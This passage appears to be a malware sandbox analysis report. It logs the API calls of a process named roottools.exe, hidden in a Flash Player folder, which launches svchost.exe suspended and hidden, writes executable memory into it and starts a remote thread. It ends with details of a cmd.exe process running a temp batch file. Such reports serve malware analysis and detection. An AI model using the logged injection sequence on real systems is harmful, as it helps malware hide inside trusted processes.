Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ResetEvent, address_out = 0x759d16dd True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x759d1410 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x759d16c5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x759d10ff True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x759d183e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x759d1136 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x759d4220 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x759d110c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x759d186e True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetIconInfo, address_out = 0x758e49ea True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x758e8deb True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadImageW, address_out = 0x758dfbd1 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x758e1218 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77ce25dd True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x758d8a29 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UnregisterClassW, address_out = 0x758d9f84 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayoutList, address_out = 0x758e2e69 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x758e3e75 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharToOemW, address_out = 0x75931a26 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x758d7809 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x758e05ba True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x758d787b True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x758e0b4a True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x758db17d True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x758e6110 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongA, address_out = 0x758dd156 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperW, address_out = 0x758df350 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x758d9a55 True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x76240000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptImportPublicKeyInfo, address_out = 0x76256c0e True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x76240000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptDecodeObjectEx, address_out = 0x7624d718 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x7775469d True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x777545f0 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7776779b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x77750e0c True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x777540e6 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x77750e24 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x77752a66 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x777540fe True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptVerifySignatureW, address_out = 0x7774c54a True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetNamedSecurityInfoW, address_out = 0x77749fe2 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetNamedSecurityInfoW, address_out = 0x7774f4fd True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x7774df4e True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x7774df36 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorSacl, address_out = 0x77754680 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x777514d6 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x7774df66 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x77754304 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x7775412e True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x77754620 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x7775468d True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x7774c532 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x77751f59 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenThreadToken, address_out = 0x7775432c True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x777546ad True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x7774e124 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x7775431c True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x7774c51a True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x7775418e True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x7775415e True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorSacl, address_out = 0x77754608 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x777541b3 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x7775413b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x7774cf31 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegFlushKey, address_out = 0x7776773f True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegNotifyChangeKeyValue, address_out = 0x7774e15b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x777546e7 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyW, address_out = 0x7775445b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitiateSystemShutdownExW, address_out = 0x7779db3a True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x7774df14 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x76a70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x76a83c71 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x76a70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x76a91e46 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x76a70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76af5708 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x763845bf True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsURLW, address_out = 0x763855bf True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryEmptyW, address_out = 0x763acd81 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpNIW, address_out = 0x76384745 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRenameExtensionW, address_out = 0x763ad32a True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x763846e9 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathMatchSpecW, address_out = 0x763886f7 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x7638c39c True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x76383248 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAddBackslashW, address_out = 0x7638c177 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfW, address_out = 0x763b066c True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathUnquoteSpacesW, address_out = 0x76385331 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathSkipRootW, address_out = 0x7639fbf5 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7638a1b9 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = SHDeleteValueW, address_out = 0x7637fcca True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfA, address_out = 0x7639edfe True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryW, address_out = 0x7637ff07 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveBackslashW, address_out = 0x76385c62 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = UrlUnescapeA, address_out = 0x7639c6fb True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathQuoteSpacesW, address_out = 0x763ace21 True 1
Fn
Module Load module_name = PSAPI.DLL, base_address = 0x75ad0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x75ad13f0 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromString, address_out = 0x75afe599 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x75b209ad True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x75b0363b True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoSetProxyBlanket, address_out = 0x75af5ea5 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75b29d0b True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x75b286d3 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x76965689 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x76964de0 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDCW, address_out = 0x7696e743 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x769654f4 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x76964f70 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x76965f49 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x76965ea6 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x769658b3 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x75f449e9 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x75f3b406 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x75f3a33e True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x75f31b56 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x75f44c7d True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCrackUrlA, address_out = 0x75f2d075 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x75f375e8 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x75f4f18e True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x75f3ab49 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x75fb18f8 True 1
Fn
Module Load module_name = urlmon.dll, base_address = 0x76690000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\urlmon.dll, function = ObtainUserAgentString, address_out = 0x766c1d76 True 1
Fn
Module Load module_name = OLEAUT32.dll, base_address = 0x761b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x761b3eae True 1
Fn
Module Load module_name = Secur32.dll, base_address = 0x75690000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x7582a415 True 1
Fn
Module Get Handle module_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, base_address = 0x400000 True 1
Fn
System Get Computer Name result_out = YKYD69Q True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = InstallDate, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = DigitalProductId False 1
Fn
System Get Info type = Operating System True 3
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlDosPathNameToNtPathName_U, address_out = 0x77d0ce41 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtCreateFile, address_out = 0x77cd00a4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtClose, address_out = 0x77ccf9d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtQueryEaFile, address_out = 0x77cd1314 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtSetEaFile, address_out = 0x77cd19b0 True 1
Fn
File Create filename = \??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = FILE_READ_EA, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Get Info filename = \??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, type = extended True 1
Fn
Mutex Create mutex_name = C2E6ECE9938A43206F172A85684E36DB True 1
Fn
Mutex Open mutex_name = 9B4D68961731FE3C22DA08B640799EB6, desired_access = SYNCHRONIZE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Mutex Open mutex_name = E58EFF540968A436E982FCFA1C0445A2, desired_access = SYNCHRONIZE False 2
Fn
Process Create process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, os_pid = 0x638, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Fn
Mutex Create mutex_name = A63A6CDA308CF3B4F10C6B82D6B9EA5B True 1
Fn
Memory Allocate process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x70000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688 True 1
Fn
Memory Write process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x70000, size = 114688 True 1
Fn
Data
Memory Write process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x876c4, size = 4 True 1
Fn
Data
Memory Write process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x877d0, size = 4 True 1
Fn
Data
Memory Write process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x87d38, size = 4 True 1
Fn
Data
Thread Create process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, proc_address = 0x795bc, proc_parameter = 0, flags = THREAD_RUNS_IMMEDIATELY True 1
Fn
Mutex Open mutex_name = 20BC29E135FB9B01285187E3B5593CC8, desired_access = SYNCHRONIZE False 2
Fn
Process Create process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, os_pid = 0x7e0, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Fn
Mutex Create mutex_name = 629BC138D148FEC80DAF76D454EF252E True 1
Fn
Memory Allocate process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x70000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688 True 1
Fn
Memory Write process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x70000, size = 114688 True 1
Fn
Data
Memory Write process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x876c4, size = 4 True 1
Fn
Data
Memory Write process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x877d0, size = 4 True 1
Fn
Data
Memory Write process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x87d38, size = 4 True 1
Fn
Data
Thread Create process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, proc_address = 0x795bc, proc_parameter = 0, flags = THREAD_RUNS_IMMEDIATELY True 1
Fn
Process #23: cmd.exe
(Host: 114, Network: 0)
+
Information Value
ID #23
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:05:38, Reason: Child Process
Unmonitor End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration 00:04:35
OS Process Information
+
Information Value
PID 0x6a4
Parent PID 0x594 (c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
